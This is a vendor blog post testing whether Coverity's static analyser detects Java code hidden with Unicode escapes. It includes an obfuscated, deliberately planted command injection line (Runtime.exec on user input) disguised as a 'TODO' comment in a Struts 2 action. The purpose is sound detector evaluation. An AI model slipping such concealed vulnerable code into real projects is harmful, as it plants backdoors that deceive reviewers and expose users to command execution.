Unicode Escaping: Is Coverity Affected?

Posted by Jon, Comments

Java Unicode Escaping Background

The Java 8 Language Specification (JLS) Section 3.3 defines the following:

A compiler for the Java programming language ("Java compiler") first recognizes Unicode escapes in its input, translating the ASCII characters \u followed by four hexadecimal digits to the UTF-16 code unit (ยง3.1) for the indicated hexadecimal value, and passing all other characters unchanged. Representing supplementary characters requires two consecutive Unicode escapes. This translation step results in a sequence of Unicode input characters.

This means someone can embed an escaped Unicode character in Java source code that will be unescaped when it's compiled. Searching Stack Overflow highlights the confusion that can arise from Unicode escaped values in Java source code.

From a security standpoint, a developer could potentially hide malicious code using this technique. Jeff William's BlackHat 2009 presentation on "Enterprise Java Rootkits" described exactly this (see the "Abusing Code Formatting" section), in addition to other attacks. Go read that presentation, it's good!

What's Old is New

Mathias Bynens recently posted a comment regarding Java Unicode escaping, re-discovering what Jeff discussed. This was picked up by Peter Jaric, who created the Java Obfuscator - Lite microsite so people can obfuscate their code. The site had the following:

When you're programming you may sometimes feel that you need to hide some code from a coworker or a static code analysis tool.

Working at Coverity, I saw that statement as throwing down the gauntlet :) Curious, I wanted to see how Coverity's static analysis would deal with Unicode escapes. Coverity uses the Edison Design Group's (EDG) Java front end. Since we're not using Oracle's compiler, there does exist a small chance that EDG's front end could miss it.

Test

I structured the test so any Coverity user could play along at home.

Create the Test Application

I'll use the Struts 2 starter archetype:

mvn archetype:generate -B -DgroupId=com.example \
                          -DartifactId=obfuscation-test \
                          -DarchetypeGroupId=org.apache.struts \
                          -DarchetypeArtifactId=struts2-archetype-starter \
                          -DarchetypeVersion=2.3.20 \
                          -DremoteRepositories=http://struts.apache.org

This created a directory called obfuscation-test for me.

Add a Sink

I'll add an OS command injection sink to the application, using Java's Runtime.exec method. Struts 2 uses getter / setter syntax on entry points to pass in user controlled data. (Read up here on a primer for Struts 2 conventions.)

Here's the evil line prior to obfuscation:

Runtime.getRuntime().exec(name);

Running that through Peter's tool gives the following:

/* TODO: fix this stuff \u002a\u002f\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u006e\u0061\u006d\u0065\u0029\u003b\u002f\u002a */

Now, just add that line to src/main/java/com/example/HelloWorldAction.java file:

    public String execute() throws Exception {

        /* TODO: fix this stuff \u002a\u002f\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u006e\u0061\u006d\u0065\u0029\u003b\u002f\u002a */
        return SUCCESS;
    }
}

Compile

Now to compile!

mvn clean package -Dmaven.test.skip=true

...

[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 1.688s
[INFO] Finished at: Fri Apr 24 11:14:56 PDT 2015
[INFO] Final Memory: 15M/302M
[INFO] ------------------------------------------------------------------------

OK, so that looks good. Now let's invoke the whole Coverity tool chain.

Coverity Analysis

I'll try to keep things brief here. Coverity captures the Java compilation by wrapping the build using a utility called cov-build. It stores what it captures into an intermediate directory. So I'll invoke that. I also have to invoke another command called cov-emit-java that stuffs the Java web application archive into the intermediate directory. Then, I'll run the actual analysis using cov-analyze, disabling all of the other checkers and only enabling the checker responsible for OS command injection, aptly named "OS_CMD_INJECTION".

  • cov-build:
$COV_BIN/cov-build --dir $IDIR mvn package -Dmaven.test.skip=true

Coverity Build Capture (64-bit) version 7.6.1.s2 on Linux 3.2.0-41-generic x86_64
Internal version numbers: 56023db682 p-jwasharmony-push-21098.188


[INFO] Scanning for projects...
...

[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 23.197s
[INFO] Finished at: Fri Apr 24 11:20:07 PDT 2015
[INFO] Final Memory: 15M/302M
[INFO] ------------------------------------------------------------------------
3 Java compilation units (100%) have been captured and are ready for analysis
The cov-build utility completed successfully.
  • cov-emit-java:
$COV_BIN/cov-emit-java --dir $IDIR --war ./target/struts2-archetype-starter.war
Coverity Java Emit version 7.6.1.s2 on Linux 3.2.0-41-generic x86_64
Internal version numbers: 56023db682 p-jwasharmony-push-21098.188

Processing webapp archive: /home/jpasski/src/obfuscation-test/target/struts2-archetype-starter.war
[STATUS] Compiling 4 JSP files
|0----------25-----------50----------75---------100|
****************************************************
4 out of 4 JSPs (100%) have been processed successfully. See details in /store/idirs/test-obfuscation/jsp-compilation-log.txt
Done; cov-emit-java took 22s
  • cov-analyze:
$COV_BIN/cov-analyze --dir $IDIR --java --disable-default -en OS_CMD_INJECTION
Coverity Static Analysis version 7.6.1.s2 on Linux 3.2.0-41-generic x86_64
Internal version numbers: 56023db682 p-jwasharmony-push-21098.188

Using 8 workers as limited by CPU(s)
...
****************************************************
[STATUS] Starting analysis run
|0----------25-----------50----------75---------100|
****************************************************
Analysis summary report:
------------------------
Files analyzed                 : 7
Total LoC input to cov-analyze : 170
Functions analyzed             : 659
Paths analyzed                 : 6497
Time taken by analysis         : 00:00:50
Defect occurrences found       : 1 OS_CMD_INJECTION

Looks like we found something! Let's add and view the result to our web UI called "Coverity Connect":

While our display of the defect could be a bit better, we still find the issue. So at least in the case of Unicode escaping, Coverity's static analysis still finds the defect. Whoop!

Closing Thoughts

If your developers are now your adversaries, you've picked very challenging adversaries! If you're an existing customer, and you think we should report on the use of Unicode escaping, especially when it looks suspicious like the above, we're interested in hearing from you.

Comments!